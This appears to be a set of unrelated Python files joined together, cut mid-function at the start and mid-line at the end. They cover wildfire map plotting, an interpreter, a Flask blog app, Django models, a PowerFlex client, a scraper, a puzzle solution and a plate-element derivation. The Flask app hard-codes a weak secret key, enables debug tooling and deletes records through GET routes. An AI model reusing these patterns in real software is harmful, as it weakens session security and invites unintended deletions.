grid encompassing multiple tiles. ''' h,v = tile_grid_dict[tile] start_h = (h*pixels) end_h = ((h+1)*pixels) start_v = (v*pixels) end_v = ((v+1)*pixels) (start_h,end_h,start_v,end_v) = (int(start_h),int(end_h),int(start_v),int(end_v)) tile_grid[start_v:end_v,start_h:end_h] = data.copy() return tile_grid def getStateBoundaries(state='California',filename='../data-sample/states.xml'): ''' This function will load the latitude/longitude boundaries of USA states from an xml file. the xml file used here was taken from: http://econym.org.uk/gmap/states.xml ''' if state == 'All': all_states = True all_pts = dict() else: all_states = False tree = ET.parse(filename) root = tree.getroot() for actor in root.findall('state'): if actor.attrib['name'] == state or all_states: pts = [] for point in actor.findall('point'): pts.append([float(point.attrib['lat']),float(point.attrib['lng'])]) pts = np.array(pts,dtype=np.float32) if all_states: state_name = actor.attrib['name'] all_pts[state_name] = pts if all_states: return all_pts else: return pts def plotContourWithStates(lat,lon,data, states=None,clim=None,xlim=None,ylim=None, saveFig=False,saveName='', label='',cmap='jet'): ''' This function will plot a contour map using latitude, longitude, and data matricies. State boundary lines will be overlaid on the contour. If a list of matrices are passed instead, each contour in the list will be plotted. ''' if states is None: states = getStateBoundaries(state='California') elif type(states) is str: states=getStateBoundaries(state=states) if cmap == 'satComp': colors = [(1, 1, 1), (0, 0, 1), (1, 0, 0)] cmap = LinearSegmentedColormap.from_list('satComp', colors, N=3) if saveFig: fntsize = 80 lnwidth = 10 fig = plt.figure(figsize=(48,38),tight_layout=True) #fig = plt.figure(figsize=(12,8),tight_layout=True) else: fig = plt.figure(figsize=(12,8),tight_layout=True) fntsize = 20 lnwidth = 2 ax1 = fig.add_subplot(1,1,1) if type(data) is list: for i in range(0,len(data)): da = data[i] la = lat[i] lo = lon[i] if clim is None: ax1.contourf(lo,la,da,cmap=cmap) else: ax1.contourf(lo,la,da,clim,cmap=cmap) else: if clim is None: img = ax1.contourf(lon,lat,data,cmap=cmap) else: img = ax1.contourf(lon,lat,data,clim,cmap=cmap) if clim is None: img_cb = fig.colorbar(img,label=label) else: img_cb = fig.colorbar(img,label=label,ticks=clim) img_cb.set_label(label=label,fontsize=fntsize) plt.xlabel('Longitude',fontsize=fntsize) plt.ylabel('Latitude',fontsize=fntsize) if type(states) is dict: for state in states: ax1.plot(states[state][:,1],states[state][:,0],'-k') if xlim is None: xlim = [-125,-66] if ylim is None: ylim = [24,50] else: #ax1.plot(states[:,1],states[:,0],'-k') if xlim is None: xlim = [-125,-113] if ylim is None: ylim = [32,43] plt.xlim(xlim) plt.ylim(ylim) if saveFig: img_cb.ax.tick_params(axis='both',labelsize=fntsize) ax1.tick_params(axis='both',labelsize=fntsize) ax1.grid(linewidth=lnwidth/4,linestyle='-.',color='k') for ln in ax1.lines: ln.set_linewidth(lnwidth) fig.savefig(saveName) plt.clf() plt.close(fig) print(saveName) return fig def daysInYear(year): ''' daysInYear: This function will return the number of days in a year by determining if the year number is a leap year. ''' if (year % 4) == 0: if (year % 100) == 0: if (year % 400) == 0: days = 366 else: days = 365 else: days = 366 else: days = 365 return days def fillEmptyCoordinatesRectilinear(data): ''' This function will fill empty values in a rectilinear grid with only the corners defined. ''' [r,c] = data.shape dataNan = data.copy() dataNan[data == 0] = np.nan r0mn = np.nanmin(dataNan[0,:]) r0mx = np.nanmax(dataNan[0,:]) c0mn = np.nanmin(dataNan[:,0]) c0mx = np.nanmax(dataNan[:,0]) #print(r0mn,r0mx,c0mn,c0mx) if abs(c0mx-c0mn) > 0 and abs(r0mx-r0mn) > 0: assert False, "Both column and row values are changing." elif abs(r0mx-r0mn) == 0: for i in range(0,r): rowValue = np.nanmax(dataNan[i,:]) dataNan[i,:] = rowValue.copy() elif abs(c0mx-c0mn) == 0: for i in range(0,c): colValue = np.nanmax(dataNan[:,i]) dataNan[:,i] = colValue.copy() else: assert False, "Did not find a valid region." return dataNan def makeGIF(indir,outfile,ext='.png',fps=None): ''' This function will take all files with extension ext from an input director indir and create a video file named outfile. NOTE: If outfile ends in (.gif) the file will be a gif, if it ends in (.mp4) the file will be an mp4. NOTE: (.mp4) is preferred to reduce file size. NOTE: Specifying a custom fps with (.mp4) will cause issues in some media players. ''' if indir[-1] == '/': files = glob.glob(indir+'*'+ext) else: files = glob.glob(indir+'/*'+ext) if len(files) > 0: if fps is None: writer = imageio.get_writer(outfile) else: writer = imageio.get_writer(outfile,fps=fps) for file in files: mem = psutil.virtual_memory()[2] if mem < 90.0: print(file) writer.append_data(imageio.imread(file)) else: print("Memory full.") writer.close() def findTensorflowGPUs(): from tensorflow.python.client import device_lib local_device_protos = device_lib.list_local_devices() return [x.name for x in local_device_protos if x.device_type == 'GPU'] def plotImageList(datas,names, clims=None,closeFig=None, saveFig=False,saveName=''): totalPlots = np.ceil(float(len(datas))**0.5) colPlots = totalPlots rowPlots = np.ceil((float(len(datas)))/colPlots) currentPlot = 0 if saveFig: fntsize = 20 lnwidth = 5 fig = plt.figure(figsize=(colPlots*12,rowPlots*10))#,tight_layout=True) if closeFig is None: closeFig = True else: fig = plt.figure(figsize=(colPlots*6,rowPlots*5))#,tight_layout=True) fntsize = 20 lnwidth = 2 if closeFig is None: closeFig = False xmin = 0 xmax = datas[0].shape[1] xticks = np.linspace(xmin,xmax,int(round((xmax-xmin)/10)+1)) ymin = 0 ymax = datas[0].shape[0] yticks = np.linspace(ymin,ymax,int(round((ymax-ymin)/10)+1)) for i in range(0,len(names)): key = names[i] currentPlot = currentPlot+1 ax = fig.add_subplot(rowPlots,colPlots,currentPlot) ax.tick_params(axis='both',labelsize=fntsize) plt.xticks(xticks) plt.yticks(yticks) #plt.xlabel('Longitude',fontsize=fntsize) #plt.ylabel('Latitude',fontsize=fntsize) plt.title(key,fontsize=fntsize) if clims is None: clim = np.linspace(0,1,10) label = '' else: clim = clims[i] label = '' img = ax.imshow(datas[i],cmap='jet',vmin=clim[0],vmax=clim[-1])#,vmin=0,vmax=1) #img = ax.contourf(self.longitude,self.latitude,getattr(self,key),levels=clim,cmap=cmap) img_cb = plt.colorbar(img,ax=ax,label=label) img_cb.set_label(label=label,fontsize=fntsize) img_cb.ax.tick_params(axis='both',labelsize=fntsize) ax.grid(linewidth=lnwidth/4,linestyle='-.',color='k') for ln in ax.lines: ln.set_linewidth(lnwidth) if saveFig: fig.savefig(saveName) if closeFig: plt.clf() plt.close(fig) def plotGriddedList(datas, saveFig=False, closeFig=None, saveName='', clim=None, cmap='jet', label='None'): ''' This function will plot the gridded measurement pair ''' inNum, outNum = datas.countData() inNames, outNames = datas.getDataNames() inTime, outTime = datas.strTime() totalPlots = np.ceil((float(inNum)+float(outNum))**0.5) colPlots = totalPlots rowPlots = np.ceil((float(inNum)+float(outNum))/colPlots) currentPlot = 0 if saveFig: fntsize = 40 lnwidth = 10 fig = plt.figure(figsize=(colPlots*24,rowPlots*20))#,tight_layout=True) if closeFig is None: closeFig = True else: fig = plt.figure(figsize=(colPlots*6,rowPlots*5))#,tight_layout=True) fntsize = 20 lnwidth = 2 if closeFig is None: closeFig = False xmin = np.round(np.min(datas.longitude),1) xmax = np.round(np.max(datas.longitude),1) xticks = np.linspace(xmin,xmax,int(round((xmax-xmin)/0.1)+1)) ymin = np.round(np.min(datas.latitude),1) ymax = np.round(np.max(datas.latitude),1) yticks = np.linspace(ymin,ymax,int(round((ymax-ymin)/0.1)+1)) names = inNames+outNames for i in range(0,len(names)): key = names[i] currentPlot = currentPlot+1 ax = fig.add_subplot(rowPlots,colPlots,currentPlot) ax.tick_params(axis='both',labelsize=fntsize) plt.xticks(xticks) plt.yticks(yticks) plt.xlabel('Longitude',fontsize=fntsize) plt.ylabel('Latitude',fontsize=fntsize) plt.title(key,fontsize=fntsize) print(clim) if clim is None: if 'FireMask' in key: clim2 = np.linspace(0,9,10) label = 'AF' elif 'Elevation' in key: clim2 = np.linspace(-1000,5000,7) label = 'Elev [m]' elif 'WindX' in key: clim2 = np.linspace(-6,6,13) label = 'u [m/s]' elif 'WindY' in key: clim2 = np.linspace(-6,6,13) label = 'v [m/s]' elif 'VegetationIndex' in key: clim2 = np.linspace(-4000,10000,8) label = 'NVDIx1000' elif 'Canopy' in key: clim2 = np.linspace(0,100,11) label = 'Canopy' else: clim2 = np.linspace(0,9,10) else: label = '' clim2 = clim img = ax.contourf(datas.longitude,datas.latitude,getattr(datas,key),levels=clim2,cmap=cmap) img_cb = plt.colorbar(img,ax=ax,label=label) img_cb.set_label(label=label,fontsize=fntsize) img_cb.ax.tick_params(axis='both',labelsize=fntsize) ax.grid(linewidth=lnwidth/4,linestyle='-.',color='k') for ln in ax.lines: ln.set_linewidth(lnwidth) if saveFig: fig.savefig(saveName) if closeFig: plt.clf() plt.close(fig) if __name__ == "__main__": devices = findTensorflowGPUs() print(devices)

#!/bin/python3 from lexer import lexer_qsl from parserqsl import parser_qsl from process.link import link from process.types import types from process.execute import execute from process.load import load from process.print import printkb from process.slink import slink import argparse p = argparse.ArgumentParser(prog='main.py', description="QSL Interpreter") p.add_argument('program', nargs="?", help="path of the program to interpret") p.add_argument('-t', '--tokens', action="store_true", help="Display the list of tokens instead of executing the program") args = p.parse_args() lqsl = lexer_qsl().build() parser = parser_qsl().build(lexer_qsl()) tv = {} vload = load(parser) vlink = link(tv) slin = slink() vtype = types() vexp = execute() vprint = printkb() if (args.program is None): while True: try: s = input('QSL> ') except EOFError: break if not s: continue lqsl.input(s) if args.tokens: # Tokenize while True: tok = lqsl.token() if not tok: break # No more input print(tok) ast = parser.parse(s, lexer=lqsl) ast.visit(vload) ast.visit(vlink) ast.visit(slin) ast.visit(vtype) ast.visit(vexp) else: with open(args.program) as f: data = f.read() lqsl.input(data) if args.tokens: while True: tok = lqsl.token() if not tok: break # No more input print(tok) ast = parser.parse(data, lexer=lqsl) for line in ast.lines: line.visit(vload) line.visit(vlink) line.visit(slin) line.visit(vtype) result = line.visit(vexp) line.visit(vprint)

"""Blogly application.""" from flask import Flask, request, redirect, render_template, url_for from models import db, connect_db, User, Post, Tag, PostTag from flask_debugtoolbar import DebugToolbarExtension app = Flask(__name__) app.config["SECRET_KEY"] = "SECRET_GARFIELD" app.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///blogly' app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False app.config['SQLALCHEMY_ECHO'] = True toolbar = DebugToolbarExtension(app) connect_db(app) db.create_all() @app.route('/') def root(): """Homepage redirects to list of users.""" return redirect("/users") ################################################## # User route @app.route('/users') def index(): """Routing for Users list """ users = User.query.all() return render_template("index.html", users=users) @app.route('/users/create', methods=["GET", "POST"]) def create_user(): """Routing for creating a user """ if request.method == "POST": # Grabs all the form values first_name = request.form['first-name'] last_name = request.form['last-name'] img_url = request.form['img-url'] img_url = img_url if img_url else None # Creates a user instance user = User(first_name=first_name, last_name=last_name, img_url=img_url) db.session.add(user) db.session.commit() return redirect('/users') return render_template('create-user.html') @app.route('/users/user/<int:id>') def user(id): """Routing for viewing a user """ user = User.query.get(id) posts = Post.query.filter(Post.user_id == id).all() return render_template('user.html', user=user, posts=posts) @app.route('/users/user/<int:id>/delete') def delete(id): """Routing for deleting a user """ user = User.query.get(id) db.session.delete(user) db.session.commit() return redirect("/users") @app.route('/users/user/<int:id>/edit', methods=["POST", "GET"]) def edit(id): """Routing for editing a user""" user = User.query.get_or_404(id) if request.method == "POST": first_name = request.form['first-name'] last_name = request.form['last-name'] img_url = request.form['img-url'] img_url = img_url if img_url else None user.first_name = first_name user.last_name = last_name user.img_url = img_url db.session.commit() return redirect('/users') return render_template("edit.html", user=user) # `` # Posting stuff @app.route('/users/user/<int:id>/posts/new', methods=["POST", "GET"]) def new_post(id): """Route for making a new post""" if request.method == "POST": # Grab form info from html title = request.form['post-title'] content = request.form['post-content'] # converts all the tags into ints tag_ids = request.form.getlist("tags") # Creates a post post = Post(title=title, content=content, user_id=id) # Grab all the tags for tag_id in tag_ids: post.tags.append(Tag.query.get(int(tag_id))) db.session.commit() return redirect(f'/users/user/{id}') # Send all the tags tags = Tag.query.all() return render_template("create-post.html", id=id, tags=tags) @app.route('/posts/<int:post_id>') def post(post_id): """Views the post""" post = Post.query.get(post_id) return render_template("post.html", post=post) @app.route('/posts/<int:post_id>/edit') def show_edit_post_form(post_id): """Shows the form to edit a post """ post = Post.query.get(post_id) tags = Tag.query.all() return render_template('edit-post.html', post=post, tags=tags) @app.route('/posts/<int:post_id>/edit', methods=["POST"]) def post_edit(post_id): """Shows the form to edit a post """ # Grab the modified changes title = request.form['post-title'] content = request.form['post-content'] list_tags = request.form.getlist("tags") # Modify the post post = Post.query.get(post_id) post.title = title post.content = content # Grab the Tag using the id from list_tags post.tags = [Tag.query.get(int(tag)) for tag in list_tags] db.session.commit() return redirect(f'/posts/{post_id}') @app.route('/posts/<int:post_id>/delete') def delete_post(post_id): """Deletes a post given the id """ post = Post.query.get(post_id) db.session.delete(post) db.session.commit() return redirect("/users") ################################################## # Tag stuff @app.route('/tags') def show_tags(): tags = Tag.query.all() return render_template('tags.html', tags=tags) @app.route('/tags', methods=["POST"]) def create_tag(): tag = request.form["tag-name"] new_tag = Tag(name=tag) db.session.add(new_tag) db.session.commit() return redirect('/tags') @app.route('/tags/create-tag') def create_tag_form(): return render_template('create-tag.html') @app.route('/tags/<int:tag_id>') def show_single_tag(tag_id): """Shows information about a tag """ tag = Tag.query.get(tag_id) print(tag.posts) return render_template('tag-info.html', tag=tag) @app.route('/tags/<int:tag_id>/edit') def edit_tag_form(tag_id): """ Shows the edit form """ tag = Tag.query.get(tag_id) return render_template('tag-edit.html', tag=tag) @app.route('/tags/<int:tag_id>/edit', methods=["POST"]) def edit_tag(tag_id): """ Handles the edit submission""" print("Look here:, we've received a post request to edit", ) tag = Tag.query.get(tag_id) # Grab the form info new_tag_name = request.form["tag-name"] # Edit tag.name = new_tag_name db.session.commit() return redirect(f'/tags/{tag_id}') @app.route('/tags/<int:tag_id>/delete') def delete_tag(tag_id): """Deletes a tag_id given the id """ tag = Tag.query.get(tag_id) db.session.delete(tag) db.session.commit() return redirect("/users") ################################################## # Refactoring # It is better to separate get/post methods, because it is easier to understand # Delete a tag has some bug - cascading # Post.query(column names)...join... # You are going to get tuple values instead of instances.

from django.db import models class Material(models.Model): name = models.CharField(max_length=50, unique=True) def __str__(self): return self.name class Meta: db_table='material' class Rock(models.Model): name = models.CharField(max_length=50, unique=True) description = models.TextField(null=True) picture = models.ImageField(upload_to="media/", null=True) added_time = models.DateTimeField(auto_now_add=True, null=True) materials = models.ManyToManyField(Material, through='RockComposition') def __str__(self): return self.name class Meta: db_table='rock' default_permissions = ('view', 'add', 'change', 'delete' ) def description_short(self): return self.description[:300] class RockComposition(models.Model): rock = models.ForeignKey(Rock, db_column='rock_id', on_delete=models.CASCADE) material = models.ForeignKey(Material, db_column='material_id', on_delete=models.PROTECT) class Meta: db_table='rock_composition' # class RockComposition(models.Model): # rock_id = models.ForeignKey(Rock, on_delete = models.CASCADE) # material_id = models.ForeignKey(Material, on_delete = models.PROTECT) # # class Meta: # db_table='rock_composition' # hunter = models.ForeignKey(User, on_delete=models.CASCADE)

# Copyright (c) 2020 Dell Inc. or its subsidiaries. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import logging import requests from PyPowerFlex import base_client from PyPowerFlex import exceptions LOG = logging.getLogger(__name__) class FaultSet(base_client.EntityRequest): def clear(self, fault_set_id): """Clear PowerFlex fault set. :type fault_set_id: str :rtype: dict """ action = 'clearFaultSet' r, response = self.send_post_request(self.base_action_url, action=action, entity=self.entity, entity_id=fault_set_id) if r.status_code != requests.codes.ok: msg = ('Failed to clear PowerFlex {entity} ' 'with id {_id}. Error: {response}' .format(entity=self.entity, _id=fault_set_id, response=response)) LOG.error(msg) raise exceptions.PowerFlexClientException(msg) return self.get(entity_id=fault_set_id) def create(self, protection_domain_id, name=None): """Create PowerFlex fault set. :type protection_domain_id: str :type name: str :rtype: dict """ params = dict( protectionDomainId=protection_domain_id, name=name ) return self._create_entity(params) def get_sdss(self, fault_set_id, filter_fields=None, fields=None): """Get related PowerFlex SDSs for fault set. :type fault_set_id: str :type filter_fields: dict :type fields: list|tuple :rtype: list[dict] """ return self.get_related(fault_set_id, 'Sds', filter_fields, fields) def delete(self, fault_set_id): """Remove PowerFlex fault set. :type fault_set_id: str :rtype: None """ return self._delete_entity(fault_set_id) def rename(self, fault_set_id, name): """Rename PowerFlex fault set. :type fault_set_id: str :type name: str :rtype: dict """ action = 'setFaultSetName' params = dict( newName=name ) return self._rename_entity(action, fault_set_id, params)

import os from setuptools import setup, Command, find_packages def readme(): with open('README.rst') as f: return f.read() class CleanCommand(Command): """Custom clean command to tidy up the project root.""" user_options = [] def initialize_options(self): pass def finalize_options(self): pass def run(self): os.system('rm -vrf build dist *.pyc *.tgz *.egg-info') setup(name = 'optlo_calc', version = '0.1', description = '''Code for Calculating Optical Loading or Transmission through microwave optical chains''', long_description = readme(), author = 'Katie Harrington', author_email = 'katie.megan.harrington@gmail.com', license = 'MIT', packages = ['optlo_calc', 'optlo_calc.optics'], package_dir = {'optlo_calc':'python'}, cmdclass={'clean':CleanCommand,}, #scripts = [] )

import requests from bs4 import BeautifulSoup as bs url2 = "https://artsandculture.google.com/asset/anne-in-a-striped-dress-fairfield-porter/TAHUTWNOPxdkYA" req2 = requests.get(url2) soup2 = bs(req2.text, "lxml") im = "https:" + soup2.find_all("img", class_="pmK5Xc")[0]["src"] # img_link td1 = soup2.find("section", class_="rw8Th QwmCXd") td3 = td1.find_all("li") # print(td3) d3 = {} for i in range(len(td3)): if "Title" in td3[i].find_all("span")[0].text: ind = td3[i].text.index(": ") k = td3[i].text[ind + 1 :][1:] d3["Title"] = k if "Creator" in td3[i].find_all("span")[0].text: ind = td3[i].text.index(": ") k = td3[i].text[ind + 1 :][1:] d3["Creator"] = k if "Location" in td3[i].find_all("span")[0].text: ind = td3[i].text.index(": ") k = td3[i].text[ind + 1 :][1:] d3["Location"] = k if "Medium" in td3[i].find_all("span")[0].text: ind = td3[i].text.index(": ") k = td3[i].text[ind + 1 :][1:] d3["Medium"] = k if "External Link" in td3[i].find_all("span")[0].text: a = td3[i].find_all("a") d3["External Link"] = a[0]["href"] print(d3) # d3['Date created']=td3[2].contents[1] # d3['Location']=td3[3].contents[1] # d3['Medium']=td3[7].find_all('a')[0].text f7 = open("/Users/Lasitha/Documents/art_tweets/scraped_data/current_tweet.txt", "w+") for i in d3: f7.write(i + ":" + d3[i] + "\n") f7.close() response = requests.get(im) if response.status_code == 200: with open( "/Users/Lasitha/Documents/art_tweets/scraped_data/imgs/current.jpg", "wb" ) as f: f.write(response.content) print(d3)

import os def main(): os.chdir(os.path.dirname(os.path.abspath(__file__))) input = open("day15_input.txt").read().splitlines() print(solve(input)) class Generator: def __init__(self, starting_value, factor, multiple=1): self.previous_value = starting_value self.factor = factor self.multiple = multiple def generate(self): self.previous_value = (self.previous_value * self.factor) % 2147483647 if self.previous_value % self.multiple == 0: return self.previous_value else: return self.generate() def to_binary(value): # 0xFFFF = '0b1111111111111111' if we do a bitwise '&' # that matches the first 16 bits of the value thus selecting # them. return value & 0xFFFF def solve(input): gen_a = Generator(int(input[0].split()[-1]), 16807) gen_b = Generator(int(input[1].split()[-1]), 48271) matches = 0 for i in range(40000000): if to_binary(gen_a.generate()) == to_binary(gen_b.generate()): matches += 1 return matches if __name__ == '__main__': main()

# -*- coding: utf-8 -*- """ Created on Fri Jun 16 10:26:16 2017 @author: Peter Wilson """ import numpy as np import sympy as sp print("sympy version: ",sp.__version__) from mpl_toolkits.mplot3d import Axes3D from matplotlib.colors import Normalize import matplotlib.pyplot as plt from matplotlib import cm from matplotlib.ticker import LinearLocator, FormatStrFormatter myfontsize = 20 labelfontsize = 14 #=============================================================================== ## Set style of plots font = {'family' : 'sans-serif', 'family' : 'Arial', 'style' : 'normal', 'weight' : 'normal', 'size' : labelfontsize} plt.rc('font', **font) plt.rc('font', serif='Helvetica Neue') #plt.rcParams['font.family'] = 'Arial' #plt.ticklabel_format(style='sci', axis='y', scilimits=(1e-4,10000)) #=============================================================================== xi = sp.Symbol('xi') eta = sp.Symbol('eta') loc1 = sp.Symbol('loc1') loc2 = sp.Symbol('loc2') alpha = sp.Symbol('alpha') beta = sp.Symbol('beta') a1 = sp.Symbol('a1') a2 = sp.Symbol('a2') a3 = sp.Symbol('a3') a4 = sp.Symbol('a4') a5 = sp.Symbol('a5') a6 = sp.Symbol('a6') a7 = sp.Symbol('a7') a8 = sp.Symbol('a8') a9 = sp.Symbol('a9') Bub = sp.Symbol('Bub') W1 = sp.Symbol('W1') W2 = sp.Symbol('W2') W3 = sp.Symbol('W3') PX1 = sp.Symbol('PX1') PX2 = sp.Symbol('PX2') PX3 = sp.Symbol('PX3') PY1 = sp.Symbol('PY1') PY2 = sp.Symbol('PY2') PY3 = sp.Symbol('PY3') # THESE ARE KRATOS NODAL ROTATIONS - DEFINED RX1 = sp.Symbol('RX1') RX2 = sp.Symbol('RX2') RX3 = sp.Symbol('RX3') RY1 = sp.Symbol('RY1') RY2 = sp.Symbol('RY2') RY3 = sp.Symbol('RY3') a = sp.Symbol('a') #xi2 - xi1 b = sp.Symbol('b') #eta2 - eta1 c = sp.Symbol('c') #eta3 - eta1 d = sp.Symbol('d') #xi3 - xi1 detJ = sp.Symbol('detJ') #Nodal coords xi1 = sp.Symbol('xi1') eta1 = sp.Symbol('eta1') xi2 = sp.Symbol('xi2') eta2 = sp.Symbol('eta2') xi3 = sp.Symbol('xi3') eta3 = sp.Symbol('eta3') #Node coordinates set to example values xi1 = 0.0 eta1 = 0.0 xi2 = 1.0 eta2 = 0.0 xi3 = 0.0 eta3 = 1.0 #Shape functions N1 = (1.0-xi-eta) N2 = xi N3 = eta # ----------------------------------------------------------------------------- # Section 1 : Define diplacement fields # ----------------------------------------------------------------------------- kirchhoffDispField = a1 + a2*xi +a3*eta + a4*xi**2 + 0.5*(a5+a6)*xi*eta + a7*eta**2 # original Bletzinger #rmDispField = a8*xi + a9*eta - Bub*xi*eta #generic bubble mode # original Bletzinger #rmDispField = a8*xi + a9*eta - (a8+a9)*xi*eta #generic bubble mode # original Bletzinger rmDispField = a8*xi + a9*eta #no bubble # original Bletzinger no bubbl field #rmDispField = N1*W1 + xi*W2 + eta*W3 + a8*xi + a9*eta # modified by explicitly including displacements, this means the constants a8 and a9 are only rotations moderatorDispField = 0.5*(a5-a6)*N2*N3 # original Bletzinger C = a5 - a6 # ----------------------------------------------------------------------------- # Section 2 : Introduce moderator field into the Kirchhoff and RM disp fields # ----------------------------------------------------------------------------- PX = kirchhoffDispField + moderatorDispField PY = kirchhoffDispField - moderatorDispField GX = rmDispField + moderatorDispField GY = rmDispField - moderatorDispField # ----------------------------------------------------------------------------- # Section 3 : Differentiate displacement fields to recover shear deformation fields # ----------------------------------------------------------------------------- kirchhoffShearField_xi = sp.diff(PX,xi) kirchhoffShearField_eta = sp.diff(PY,eta) rmShearField_xi = sp.diff(GX,xi) rmShearField_eta = sp.diff(GY,eta) # ----------------------------------------------------------------------------- # Section 4 : Setup equations # ----------------------------------------------------------------------------- # Alternative representation of the shear gap field shearGapField = rmDispField - kirchhoffDispField shearGapField_xi = GX - PX shearGapField_eta = GY - PY print("shearGapField = ",sp.simplify(shearGapField)) #Identification of the Ansatz coefficients with the node values for shifts Wi and rotations # (converted to zero value eqns) # Shear gaps at nodes should be zero eq1 = W1 - (shearGapField.subs(xi,xi1)).subs(eta,eta1) eq2 = W2 - (shearGapField.subs(xi,xi2)).subs(eta,eta2) #xi2, eta2 eq3 = W3 - (shearGapField.subs(xi,xi3)).subs(eta,eta3) #xi3, eta3 # Nodal shear deformations should be zero eq4 = PX1 - (kirchhoffShearField_xi.subs(xi,xi1)).subs(eta,eta1) eq5 = PX2 - (kirchhoffShearField_xi.subs(xi,xi2)).subs(eta,eta2) eq6 = PX3 - (kirchhoffShearField_xi.subs(xi,xi3)).subs(eta,eta3) eq7 = PY1 - (kirchhoffShearField_eta.subs(xi,xi1)).subs(eta,eta1) eq8 = PY2 - (kirchhoffShearField_eta.subs(xi,xi2)).subs(eta,eta2) eq9 = PY3 - (kirchhoffShearField_eta.subs(xi,xi3)).subs(eta,eta3) print("eq1 = ",eq1) print("eq2 = ",eq2) print("eq3 = ",eq3) print("eq4 = ",eq4) print("eq5 = ",eq5) print("eq6 = ",eq6) print("eq7 = ",eq7) print("eq8 = ",eq8) print("eq9 = ",eq9) # ----------------------------------------------------------------------------- # Section 5 : Solve equations and recover Ansatz coefficients # ----------------------------------------------------------------------------- UVector = sp.zeros(9,1) #vector of displacements, plate theory rotations still used here UVector[0] = W1 UVector[1] = W2 UVector[2] = W3 UVector[3] = PX1 UVector[4] = PX2 UVector[5] = PX3 UVector[6] = PY1 UVector[7] = PY2 UVector[8] = PY3 results = list(sp.linsolve([eq1,eq2,eq3,eq4,eq5,eq6,eq7,eq8,eq9],[a1,a2,a3,a4,a5,a6,a7,a8,a9])) ansatzCoefficients = results[0] print("\nAnsatz coefficients solved") for i in range(9): print("a",i+1,"=\t",ansatzCoefficients[i]) # ----------------------------------------------------------------------------- # Section 6 : Update previously defined fields with recovered Ansatz coefficients # ----------------------------------------------------------------------------- # updated fields denoted by appended "_u" shearGapField_u = shearGapField.subs([(a1,ansatzCoefficients[0]),(a2,ansatzCoefficients[1]),(a3,ansatzCoefficients[2]),(a4,ansatzCoefficients[3]),(a5,ansatzCoefficients[4]),(a6,ansatzCoefficients[5]),(a7,ansatzCoefficients[6]),(a8,ansatzCoefficients[7]),(a9,ansatzCoefficients[8])]) kirchhoffDispField_u = kirchhoffDispField.subs([(a1,ansatzCoefficients[0]),(a2,ansatzCoefficients[1]),(a3,ansatzCoefficients[2]),(a4,ansatzCoefficients[3]),(a5,ansatzCoefficients[4]),(a6,ansatzCoefficients[5]),(a7,ansatzCoefficients[6]),(a8,ansatzCoefficients[7]),(a9,ansatzCoefficients[8])]) #print("\n kirchhoffDispField_u = ",kirchhoffDispField_u) rmDispField_u = rmDispField.subs([(a1,ansatzCoefficients[0]),(a2,ansatzCoefficients[1]),(a3,ansatzCoefficients[2]),(a4,ansatzCoefficients[3]),(a5,ansatzCoefficients[4]),(a6,ansatzCoefficients[5]),(a7,ansatzCoefficients[6]),(a8,ansatzCoefficients[7]),(a9,ansatzCoefficients[8])]) print("\nrmDispField_u = ",rmDispField_u) moderatorDispField_u = moderatorDispField.subs([(a1,ansatzCoefficients[0]),(a2,ansatzCoefficients[1]),(a3,ansatzCoefficients[2]),(a4,ansatzCoefficients[3]),(a5,ansatzCoefficients[4]),(a6,ansatzCoefficients[5]),(a7,ansatzCoefficients[6]),(a8,ansatzCoefficients[7]),(a9,ansatzCoefficients[8])]) print("\nmoderatorDispField_u = ",moderatorDispField_u) C_u = C.subs([(a1,ansatzCoefficients[0]),(a2,ansatzCoefficients[1]),(a3,ansatzCoefficients[2]),(a4,ansatzCoefficients[3]),(a5,ansatzCoefficients[4]),(a6,ansatzCoefficients[5]),(a7,ansatzCoefficients[6]),(a8,ansatzCoefficients[7]),(a9,ansatzCoefficients[8])]) # ----------------------------------------------------------------------------- # Section 7 : Construct the updated RM (+/-) moderator displacement fields # ----------------------------------------------------------------------------- #Currently the RM disp field is overwritten with a field based on that obtained #form the original DSG formulation. The only difference is instead of representing #the displacement gap it represents the displacement (ie. +W1 to all nodes) #The rotation entries are all multiplied with lengths (a,b,c,d), resulting # in transverse displacement entries. Correct, since we're defining a displacement field rmDispField_w = N1*W1 + N2*W2 + N3*W3 rmDispField_xi = N2*0.5*(a*(PX1+PX2) + b*(PY1 + PY2)) rmDispField_eta = N3*0.5*(d*(PX1+PX3) + c*(PY1 + PY3)) #rmDispField_u = rmDispField_w + rmDispField_xi + rmDispField_eta GX_rm = rmDispField_u #The rotation entries in this field are NOT multiplied with lengths (a,b,c,d), resulting #in incorrect rotation entries to the displacement field. In fact, they only become #correct displacement entries in the right angle unit triangle special case (because side lengths are 1.0). #If the side lengths are 1.0 but the triangle is generally skewed, entries will be missing. GX_mod = moderatorDispField_u GX_u = GX_rm + GX_mod GX_u = GX_u.subs([(a1,ansatzCoefficients[0]),(a2,ansatzCoefficients[1]),(a3,ansatzCoefficients[2]),(a4,ansatzCoefficients[3]),(a5,ansatzCoefficients[4]),(a6,ansatzCoefficients[5]),(a7,ansatzCoefficients[6]),(a8,ansatzCoefficients[7]),(a9,ansatzCoefficients[8])]) # rmDispField_u defined above GY_rm = rmDispField_u GY_mod = moderatorDispField_u GY_u = GY_rm - GY_mod GY_u = GY_u.subs([(a1,ansatzCoefficients[0]),(a2,ansatzCoefficients[1]),(a3,ansatzCoefficients[2]),(a4,ansatzCoefficients[3]),(a5,ansatzCoefficients[4]),(a6,ansatzCoefficients[5]),(a7,ansatzCoefficients[6]),(a8,ansatzCoefficients[7]),(a9,ansatzCoefficients[8])]) # ----------------------------------------------------------------------------- # Section 8 : Switch from plate theory rotational DOFs to geometric rotations # ----------------------------------------------------------------------------- ## vector of displacements is updated #UVector = sp.zeros(9,1) #UVector[0] = W1 #UVector[1] = W2 #UVector[2] = W3 #UVector[3] = RX1 #UVector[4] = RX2 #UVector[5] = RX3 #UVector[6] = RY1 #UVector[7] = RY2 #UVector[8] = RY3 #print("Vector of displacements (rotations are per FEM):\n",UVector) # ## Sub in Kratos rotations #GX_u = 